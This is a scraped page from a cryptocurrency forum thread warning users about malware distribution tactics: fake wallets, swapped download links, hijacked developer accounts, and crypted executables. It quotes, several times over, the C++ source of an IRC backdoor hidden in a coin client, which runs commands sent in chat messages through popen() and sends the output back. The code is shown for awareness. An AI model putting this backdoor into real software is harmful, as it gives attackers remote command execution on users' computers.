Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 28. (Read 837801 times)
January 14, 2018, 11:37:48 AM
I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?
January 14, 2018, 12:38:32 AM
This sounds really scary, but I guess that where is the money, there are also malversations
thanks for this information
thanks for this information
January 13, 2018, 07:17:08 PM
Thank you guys for the very useful post - especially useful for all us newbies! 
January 13, 2018, 11:48:00 AM
great post ...thanks for sharing
I will add it to the black list
I will add it to the black list
January 13, 2018, 04:12:00 AM
I'm adding this to the list of possible scams:
https://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
https://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
So to my understanding...no type of anti-virus software can stop this?
Are there any new software for windows that can prevent this??
January 13, 2018, 03:03:54 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
here is the source code with macros resolved:
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance.
As you said virus scan no longer sufficient, any advice for android user ? Im kinda new to this.
January 12, 2018, 08:37:34 PM
Thank you for sharing! 
January 12, 2018, 01:48:24 PM
Thanks for sharing!
January 12, 2018, 04:03:28 AM
Then how people not IT knowledgeable like me detect any fake coin with malware wallet?
Any advise?
Any advise?
January 11, 2018, 08:07:59 AM
Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.
Never forget that if you're not paying for the product, you ARE the product.
January 11, 2018, 02:59:51 AM
Increasing malware infection is very unfortunate experience. But based on my experience everyone of us need to understand why are they're flourish even though We secure our system. Malware is a business for some people. From that perspective We should change our mind set. Do our best protect our interest. in our part we should increase our level of knowledge on how to fight the malware.
January 10, 2018, 09:03:05 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
here is the source code with macros resolved:
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance.
January 10, 2018, 04:55:05 AM
Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
January 09, 2018, 03:45:36 AM
Thanks for the info...I hope this forum will help me to save my money from scammers. Experience unfortunately was sad already.
January 08, 2018, 02:30:38 PM
Thanks for the sharing. I will be more secured from now and then.
January 08, 2018, 05:08:07 AM
For this reason a love Bitcointalk.org. Thank you!!
January 08, 2018, 03:52:38 AM
Thanks for the info
January 05, 2018, 09:50:03 AM
It is dangerous even for sites to go, not to mention the downloads )))
January 04, 2018, 03:52:01 PM
a really good topic, often people start to think about the safety of their wallets when it's too late
January 03, 2018, 08:15:37 PM
Thank for the information. So many way that hackers are trying to steal our money. I will post and share this information to help others in the community stay safe while trading or online.
Jump to: